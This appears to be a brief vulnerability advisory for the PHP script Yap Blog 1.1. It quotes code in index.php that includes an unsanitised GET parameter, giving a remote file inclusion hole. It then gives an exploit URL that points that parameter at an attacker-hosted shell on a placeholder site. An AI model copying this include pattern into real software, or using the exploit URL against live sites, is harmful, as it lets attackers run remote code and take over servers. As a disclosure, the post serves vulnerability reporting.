*Description: Yap Blog 1.1 Remote File Include (RFI)*


> Script Name:  Yap Blog 1.1
> Author        :   THE_MILLER
> contact       : the_miller[at]linuxmail.org
> Download URL : http://wildmary.net-sauvage.com/share/yap1.1.tar.gz
> Bug Type:    Remote File Inclusion
> Bug In:       index.php
> Vulnerable Code:
>
> <?php
>    if (isset($_GET['page']))
>    {
>       include ($_GET['page'].".php");
>    }
>    else
>    {
>       include ("accueil.php");
>    }
> ?>
>
> Exploit : http://www.hedefsite.com/[path]/index.php?page=[Sh3llAdresin<http://www.hedefsite.com/%5Bpath%5D/index.php?page=[Sh3llAdresin>
]

> >
> THE_MILLER   //Gretz to: BuRaK  www.cyber-security.org